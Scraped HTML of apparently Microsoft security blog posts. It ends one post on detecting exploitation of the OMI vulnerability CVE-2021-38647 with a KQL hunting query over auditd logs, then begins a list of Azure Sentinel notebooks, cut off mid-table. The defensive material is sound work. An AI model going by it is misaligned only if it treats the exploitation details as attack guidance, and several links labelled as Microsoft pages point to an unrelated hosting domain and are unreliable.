BCX8">the<SPAN>&nbsp;</SPAN></SPAN></SPAN><A class="Hyperlink SCXW138185179 BCX8" href="#" target="_blank" rel="noreferrer noopener"><SPAN class="TextRun Underlined SCXW138185179 BCX8" data-contrast="none"><SPAN class="NormalTextRun SCXW138185179 BCX8" data-ccp-charstyle="Hyperlink">SCXCore</SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8" data-ccp-charstyle="Hyperlink"><SPAN>&nbsp;</SPAN>code in GitHub</SPAN></SPAN></A><SPAN class="TextRun SCXW138185179 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW138185179 BCX8">, this the behavior of the<SPAN>&nbsp;</SPAN></SPAN></SPAN><SPAN class="TextRun SCXW138185179 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SpellingErrorV2 SCXW138185179 BCX8">ExecuteScript</SPAN></SPAN><SPAN class="TextRun SCXW138185179 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW138185179 BCX8">&nbsp;method</SPAN><SPAN class="NormalTextRun SCXW138185179 BCX8">:</SPAN></SPAN><SPAN class="EOP SCXW138185179 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="executescript_behavior.png" style="width: 572px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311952i8FAAABB5CC39FEEA/image-size/large?v=v2&amp;px=999" role="button" title="executescript_behavior.png" alt="executescript_behavior.png" /></span></SPAN></P> <P>&nbsp;</P> <H3><FONT size="5">How can we cover both methods (ExecuteShellCommand and ExecuteScript) and show what the script executed?</FONT></H3> <P><SPAN data-contrast="auto">As mentioned before, both methods execute from the&nbsp;<STRONG>/var/opt/microsoft/scx/tmp</STRONG>&nbsp;directory. Therefore, all we have to do is create a&nbsp;JOIN query to show the process parent-child relationship to get to the commands executed via the script method:</SPAN></P> <P>&nbsp;</P> <DIV> <PRE><SPAN>let&nbsp;scx_execve=(){<BR /></SPAN><SPAN>Syslog<BR /></SPAN><SPAN>|&nbsp;parse&nbsp;SyslogMessage&nbsp;with&nbsp;"type="&nbsp;EventType&nbsp;"&nbsp;audit("&nbsp;*&nbsp;"):&nbsp;"&nbsp;EventData<BR /></SPAN><SPAN>|&nbsp;where&nbsp;EventType&nbsp;=~&nbsp;"AUOMS_EXECVE"&nbsp;and&nbsp;EventData&nbsp;has&nbsp;'/var/opt/microsoft/scx/tmp'<BR /></SPAN><SPAN>|&nbsp;project&nbsp;TimeGenerated,&nbsp;EventType,&nbsp;Computer,&nbsp;EventData<BR /></SPAN><SPAN>|&nbsp;parse&nbsp;EventData&nbsp;with&nbsp;*&nbsp;"syscall="&nbsp;syscall&nbsp;"&nbsp;syscall_r="&nbsp;*&nbsp;"&nbsp;success="&nbsp;success&nbsp;"&nbsp;exit="&nbsp;exit&nbsp;"&nbsp;a0"&nbsp;*&nbsp;"&nbsp;ppid="&nbsp;ppid&nbsp;<BR />"&nbsp;pid="&nbsp;pid&nbsp;"&nbsp;audit_user="&nbsp;audit_user&nbsp;"&nbsp;auid="&nbsp;auid&nbsp;"&nbsp;user="&nbsp;user&nbsp;"&nbsp;uid="&nbsp;uid&nbsp;"&nbsp;group="&nbsp;group&nbsp;"&nbsp;gid="&nbsp;gid&nbsp;<BR />"effective_user="&nbsp;effective_user&nbsp;"&nbsp;euid="&nbsp;euid&nbsp;"&nbsp;set_user="&nbsp;set_user&nbsp;"&nbsp;suid="&nbsp;suid&nbsp;"&nbsp;filesystem_user="&nbsp;filesystem_user&nbsp;<BR />"&nbsp;fsuid="&nbsp;fsuid&nbsp;"&nbsp;effective_group="&nbsp;effective_group&nbsp;"&nbsp;egid="&nbsp;egid&nbsp;"&nbsp;set_group="&nbsp;set_group&nbsp;"&nbsp;sgid="&nbsp;sgid&nbsp;<BR />"&nbsp;filesystem_group="&nbsp;filesystem_group&nbsp;"&nbsp;fsgid="&nbsp;fsgid&nbsp;"&nbsp;tty="&nbsp;tty&nbsp;"&nbsp;ses="&nbsp;ses&nbsp;"&nbsp;comm=\""&nbsp;comm&nbsp;"\"&nbsp;exe=\""&nbsp;exe&nbsp;"\""&nbsp;*&nbsp;<BR />"cwd=\""&nbsp;cwd&nbsp;"\""&nbsp;*&nbsp;"name=\""&nbsp;name&nbsp;"\""&nbsp;*&nbsp;"cmdline="&nbsp;cmdline&nbsp;"&nbsp;redactors="&nbsp;*<BR /></SPAN><SPAN>|&nbsp;where&nbsp;uid&nbsp;==&nbsp;'0'<BR /></SPAN><SPAN>|&nbsp;where&nbsp;cwd&nbsp;==&nbsp;'/var/opt/microsoft/scx/tmp'<BR /></SPAN><SPAN>|&nbsp;where&nbsp;success&nbsp;==&nbsp;'yes'<BR /></SPAN><SPAN>};<BR /></SPAN><SPAN>scx_execve<BR /></SPAN><SPAN>|&nbsp;where&nbsp;comm&nbsp;==&nbsp;'sh'&nbsp;//&nbsp;ExecuteScript&nbsp;cmdline&nbsp;would&nbsp;trigger&nbsp;on&nbsp;/bin/sh&nbsp;/etc/opt/microsoft/scx/conf/tmpdir/scx_<BR /></SPAN><SPAN>|&nbsp;join&nbsp;kind=leftouter&nbsp;(&nbsp;scx_execve&nbsp;)&nbsp;on&nbsp;$left.Computer&nbsp;==&nbsp;$right.Computer,&nbsp;$left.pid&nbsp;==&nbsp;$right.ppid<BR /></SPAN><SPAN>|&nbsp;project-rename&nbsp;parentEventData=EventData,parentppid=ppid,parentpid=pid,parentcomm=comm,parentexe=exe,<BR />parentname=name,parentcmdline=cmdline,childEventData=EventData1,childppid=ppid1,childpid=pid1,childcomm=comm1<BR />,childexe=exe1,childname=name1,childcmdline=cmdline1<BR /></SPAN><SPAN>|&nbsp;project&nbsp;TimeGenerated,&nbsp;Computer,&nbsp;user,&nbsp;parentEventData,parentppid,parentpid,parentcomm,parentexe,parentname,parentcmdline,<BR />childEventData,childppid,childpid,childcomm,childexe,childname,childcmdline<BR /></SPAN><SPAN>|&nbsp;extend&nbsp;Timestamp&nbsp;=&nbsp;TimeGenerated,&nbsp;HostCustomEntity&nbsp;=&nbsp;Computer,&nbsp;AccountCustomEntity&nbsp;=&nbsp;user</SPAN></PRE> </DIV> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Final_Query.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312507i6564DFF9C8850EA7/image-size/large?v=v2&amp;px=999" role="button" title="Final_Query.PNG" alt="Final_Query.PNG" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">This is now the hunting query we share via our Azure Sentinel GitHub repo!</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">That’s it! I am sure there is more to explore! I hope this lab environment can help you to test a few things in a safer way and experience what it might look like if it happens in your environment.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><STRONG><SPAN class="NormalTextRun BCX8 SCXW238013921">Once again, we highly recommend upgrading the OMI agent to version 1.6.8-1+, and if possible,&nbsp;</SPAN><SPAN class="NormalTextRun BCX8 SCXW238013921">controlling</SPAN><SPAN class="NormalTextRun BCX8 SCXW238013921">&nbsp;</SPAN><SPAN class="NormalTextRun BCX8 SCXW238013921">access</SPAN><SPAN class="NormalTextRun BCX8 SCXW238013921">&nbsp;to ports 5986,5985 and 1270.</SPAN>&nbsp;</STRONG></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<STRONG>Remember that this vulnerability is actively being exploited. Therefore, make sure you do not expose your lab environment to the Internet.</STRONG></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In addition, remember that the behavior&nbsp;documented in this post is not malicious. The lab&nbsp;was created&nbsp;to help&nbsp;us understand how the execution of commands or a script&nbsp;was&nbsp;being&nbsp;handled by OMI&nbsp;from a data perspective. You&nbsp;must&nbsp;then go through the results of those queries and validate what&nbsp;is legitimate behavior&nbsp;or not&nbsp;depending on your organization’s baseline.&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Also, use this knowledge to map data&nbsp;you collect&nbsp;to every single action documented&nbsp;</SPAN><SPAN data-contrast="auto">;)</img>&nbsp;You might be collecting data from other sources that provide the same or similar visibility.</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2><FONT size="6"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Resources</SPAN></FONT></H2> <UL> <LI><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Linux Lab Environment - OMI Vulnerability:&nbsp;<A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</A></SPAN></LI> <LI><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> Install OMS Agent bash script:&nbsp;<A href="#" target="_blank" rel="noopener">Blacksmith/Install-OMS-Linux-Agent.sh at master · OTRF/Blacksmith (github.com)</A></SPAN></LI> <LI><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Install OMS Auditd Pluging bash script:&nbsp;<A href="#" target="_blank" rel="noopener">Blacksmith/Install-OMS-Auditd-Plugin.sh at master · OTRF/Blacksmith (github.com)</A></SPAN></LI> <LI><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Install OMI bash script:&nbsp;<A href="#" target="_blank" rel="noopener">Blacksmith/Install-OMI.sh at master · OTRF/Blacksmith (github.com)</A></SPAN></LI> <LI><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Hunting query: <A href="#" target="_blank">Azure-Sentinel/SCXExecuteRunAsProviders.yml at master · Azure/Azure-Sentinel (github.com)</A></SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">References</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093" target="_blank" rel="noopener"><SPAN data-contrast="none">Hunting for OMI Vulnerability Exploitation with Azure Sentinel - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-threats-on-linux-with-azure-sentinel/ba-p/1344431" target="_blank" rel="noopener"><SPAN data-contrast="none">Hunting Threats on Linux with Azure Sentinel - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/guided-hunting-notebook-base64-encoded-linux-commands/ba-p/1579484" target="_blank" rel="noopener"><SPAN data-contrast="none">Guided Hunting Notebook: Base64-Encoded Linux Commands - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Collect Syslog data sources with Log Analytics agent in Azure Monitor - Azure Monitor | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">microsoft/SCXcore: System Center Cross Platform Provider for Operations Manager (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OMS-Agent-for-Linux/tools/OMIcheck at master · microsoft/OMS-Agent-for-Linux (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">7.6.&nbsp;Understanding Audit Log Files Red Hat Enterprise Linux 7 | Red Hat Customer Portal</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Release v1.6.8-0 · microsoft/omi (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">microsoft/OMS-Auditd-Plugin: Auditd plugin that forwards audit events to OMS Agent for Linux (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel/SCXRunAsProviderExecuteShellCommand.yml at master · Azure/Azure-Sentinel (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> Fri, 24 Sep 2021 16:26:22 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-a-linux-lab-with-auoms-set-up-to-learn/ba-p/2772581 Cyb3rWard0g 2021-09-24T16:26:22Z Azure Sentinel Notebooks Ninja Part 3: Overview of the Pre-built Notebooks - the Grand List https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-3-overview-of-the-pre-built/ba-p/2768838 <P><EM>This installment is part of&nbsp;a broader&nbsp;learning&nbsp;series to&nbsp;help you become&nbsp;a Jupyter Notebook ninja in Azure Sentinel.&nbsp;The installments will be bite-sized to enable you to easily digest the new content.</EM>&nbsp;</P> <P>&nbsp;</P> <UL> <LI><STRONG>Part 1:</STRONG>&nbsp;<A href="#" target="_blank" rel="noopener">What are notebooks and when&nbsp;do you need them</A>?&nbsp;</LI> <LI><STRONG>Part 2:</STRONG>&nbsp;<A href="#" target="_blank" rel="noopener">How to get started with notebooks and tour&nbsp;the features</A>&nbsp;</LI> <LI><STRONG>Part 3:&nbsp;</STRONG>Overview of the pre-built notebooks: the Grand List&nbsp;– <STRONG><EM>this post</EM></STRONG></LI> <LI><STRONG>Part 4:&nbsp;</STRONG>How to create your own notebooks from scratch and how&nbsp;to customize the existing ones&nbsp;</LI> </UL> <P>Through <A href="#" target="_blank" rel="noopener">Part 1</A> and <A href="#" target="_blank" rel="noopener">Part 2</A> of this Azure Sentinel Notebook Ninja series, we’ve discussed the concepts and activities to best become acclimated with Jupyter notebooks for Azure Sentinel. The next step in our process is understanding the value of having ready-made notebooks ready for use as part of the solution.</P> <P>&nbsp;</P> <P>When a customer stands-up Azure Sentinel for the first time, there are a number of additional pieces of ready-to-use collateral that are provided <EM>out-of-the-box</EM> including Analytics Rules, Hunting queries, Connectors, Solutions, Workbooks – and – you guessed it – <STRONG>Notebooks</STRONG>.</P> <P>&nbsp;</P> <P>The notebooks are mostly one of three types:</P> <P>&nbsp;</P> <UL> <LI><STRONG>Exploration </STRONG>notebooks. These are meant to be used as they are or with your own customizations to explore specific hunting and investigation scenarios. Examples of this type include the Entity explorer series. (“Entity” refers to items such as hosts, IP addresses, accounts, URLs, etc.)</LI> <LI><STRONG>Simple How-To</STRONG> notebooks like the Get Started notebook.</LI> <LI><STRONG>Sample</STRONG> notebooks. These are longer and are meant to be instructional examples following a real or simulated hunt or investigation.</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="rodtrent_0-1632174794690.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311667iE0C577E9BA86A6C8/image-size/large?v=v2&amp;px=999" role="button" title="rodtrent_0-1632174794690.png" alt="rodtrent_0-1632174794690.png" /></span></P> <P>&nbsp;</P> <P>The following Grand List represents the notebooks that are provided when setting up Azure Sentinel.</P> <P>&nbsp;</P> <H2><FONT size="5">Azure Sentinel Notebooks – The Grand List</FONT></H2> <P>&nbsp;</P> <CENTER> <TABLE class=" lia-align-left" style="border-style: solid;" width="auto"> <TBODY> <TR> <TD width="157.906px" height="30px" style="vertical-align: top; width: 200px;"> <P><STRONG>Notebook Name</STRONG></P> </TD> <TD width="216.328px" height="30px" style="vertical-align: top; width: 100px;"> <P><STRONG>Type</STRONG></P> </TD> <TD width="432.672px" height="30px" style="vertical-align: top; width: 450px;"> <P><STRONG>Description</STRONG></P> </TD> <TD width="316.094px" height="30px" style="vertical-align: top; width: 200px;"> <P><STRONG>Special Requirements</STRONG></P> </TD> </TR> <TR> <TD width="157.906px" height="30px" style="vertical-align: top; width: 200px;"> <P>&nbsp;</P> </TD> <TD width="216.328px" height="30px" style="vertical-align: top; width: 100px;"> <P>&nbsp;</P> </TD> <TD width="432.672px" height="30px" style="vertical-align: top; width: 450px;"> <P>&nbsp;</P> </TD> <TD width="316.094px" height="30px" style="vertical-align: top; width: 200px;"> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>A Getting Started Guide For Azure Sentinel ML Notebooks</STRONG></A></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>This notebook guides you through the basic steps of using notebooks for security analysis. It covers all the basic steps you need to understand to start using the notebooks provided with Azure Sentinel.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SigninLogs</P> <P>&nbsp;</P> <P><STRONG>External service(s):&nbsp;</STRONG>VirusTotal,&nbsp;MaxMind, MSTICPy</P> <P>&nbsp;</P> <P><STRONG>Package(s): </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>A Getting Started Guide For PowerShell AML Notebooks</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Getting Started, PowerShell</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>This notebook takes you through the basics needed to get started with PowerShell notebooks that leverage Azure Sentinel data and APIs.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> <P>&nbsp;</P> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="157.906px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>A Tour of Cybersec notebook features</STRONG></P> </TD> <TD width="216.328px" height="219px" style="vertical-align: top; width: 100px;"> <P>Getting Started</P> </TD> <TD width="432.672px" height="219px" style="vertical-align: top; width: 450px;"> <P>This notebook takes you through some of the features of Azure Sentinel notebooks and MSTICPy. It's a good second notebook to explore after "A Getting Started Guid for Azure ML notebooks". It covers data queries, visualization, data analysis, enrichment with threat intelligence and pivot functions. It can be run against you Azure Sentinel workspace or standalone, with sample data.</P> </TD> <TD width="316.094px" height="219px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert</P> <P>&nbsp;</P> <P><EM>If no data types are available, sample data will be used.</EM></P> <P>&nbsp;</P> <P><STRONG>Package(s):</STRONG> MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Configuring your Notebook Environment</STRONG></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Configuration</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>This notebook takes you through detailed setup of your settings for Azure Sentinel Notebooks and the MSTICPy library. It covers: Setting up your Python environment for notebooks (not required for AML notebooks), Creating and editing your msticpyconfig.yaml file, Understanding and managing you config.json file.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Package(s): </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>Credential Scan on Azure Blob Storage</STRONG></A></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook provides step-by-step instructions and sample code to detect credential leak into Azure Blob Storage using Azure SDK for Python.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Package(s): </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>Credential Scan on Azure Data Explorer</STRONG></A></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook provides step-by-step instructions and sample code to detect credential leak into Azure Data Explorer using Azure SDK for Python and KQL.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Package(s): </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="84px" style="vertical-align: top; width: 200px;"> <P><A href="#" target="_blank" rel="noopener"><STRONG>Credential Scan on Azure Log Analytics</STRONG></A></P> </TD> <TD width="216.328px" height="84px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="84px" style="vertical-align: top; width: 450px;"> <P>This notebook provides step-by-step instructions and sample code to detect credential leak into Azure Log Analytics using Azure SDK for Python and KQL.</P> </TD> <TD width="316.094px" height="84px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent</P> <P>&nbsp;</P> <P><STRONG>Package(s): </STRONG>MSTICPy</P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer – Account</STRONG></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>Use queries and visualizations to help you assess the security state of an AAD/O365 account or an account on a local host. It includes examining Azure Active Directory (AAD) and Office365 activity for an account and identifying any related anomalous behavior. Allows you to correlate the IP addresses in related events with threat intelligence sources.​</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat, AAD, OfficeActivity</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp; </STRONG>kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, ipywidgets, ipython, dnspython, ipwhois, folium, maxminddb_geolite2</P> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - Domain and URL</STRONG></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>Use queries and visualizations to help you assess the security state of a DNS host or domain name. Examine DNS requests to look for malicious DNS usage, such as DNS tunneling, as well as anomalous DNS name lookups. Query threat intelligence and domain ownership using WhoIS information for a specific DNS name, to get a better understanding of the domain name’s reputation.</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat, DNS, Syslog</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> <SPAN>kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, ipywidgets, ipython, dnspython, ipwhois, folium, maxminddb_geolite2</SPAN></P> </TD> </TR> <TR> <TD width="157.906px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - IP Address</STRONG></P> </TD> <TD width="216.328px" height="111px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="111px" style="vertical-align: top; width: 450px;"> <P>Brings together a series of queries and visualizations to help you assess the security state of an IP address. It works with both internal addresses and public addresses.</P> </TD> <TD width="316.094px" height="111px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat</P> <P>&nbsp;</P> <P><STRONG>External service(s):</STRONG>&nbsp;VirusTotal, Alienvault OTX, IBM Xforce</P> </TD> </TR> <TR> <TD width="157.906px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - Linux Host</STRONG></P> </TD> <TD width="216.328px" height="165px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="165px" style="vertical-align: top; width: 450px;"> <P>This notebook brings together a series of tools and techniques to enable threat hunting within the context of a singular Linux host. The notebook utilizes a range of data sources to achieve this but in order to support the widest possible range of scenarios this Notebook prioritizes using common Syslog data.</P> </TD> <TD width="316.094px" height="165px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> Syslog, Auditd_CL, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG> <SPAN>kqlmagic, msticpy, pandas, pandas_bokeh, numpy, matplotlib, networkx, seaborn, datetime, ipywidgets, ipython, dnspython, ipwhois, folium, maxminddb_geolite2</SPAN></P> </TD> </TR> <TR> <TD width="157.906px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Entity Explorer - Windows Host</STRONG></P> </TD> <TD width="216.328px" height="192px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="192px" style="vertical-align: top; width: 450px;"> <P>Brings together a series of queries and visualizations to help you determine the security state of the Windows host or virtual machine that you are investigating. It looks for related alerts, allows you to examine logon sessions and processes, check process command lines for IoCs and explores network traffic between the host and external endpoints.</P> </TD> <TD width="316.094px" height="192px" style="vertical-align: top; width: 200px;"> <P><STRONG>Data type(s):</STRONG> SecurityEvent, SecurityAlert, AzureNetworkAnalytics_CL, Heartbeat</P> <P>&nbsp;</P> <P><STRONG>Package(s):&nbsp;</STRONG>kqlmagic, msticpy, pandas, numpy, matplotlib, bokeh, networkx, ipywidgets, ipython, scikit_learn, dnspython, ipwhois, folium, maxminddb_geolite2</P> </TD> </TR> <TR> <TD width="157.906px" height="138px" style="vertical-align: top; width: 200px;"> <P><STRONG>Guided Hunting - Anomalous Office365 Exchange Sessions</STRONG></P> </TD> <TD width="216.328px" height="138px" style="vertical-align: top; width: 100px;"> <P>Hunting</P> </TD> <TD width="432.672px" height="138px" style="vertical-align: top; width: 450px;"> <P>Brings together a series of data science techniques to help you hunt for anomalous sessions in your Office Exchange logs. It queries the OfficeActivity table, creates sessions from the PowerShell cmdlets (e.g. Set-Mailbox), trains a model and then visualizes the sessions.</P> 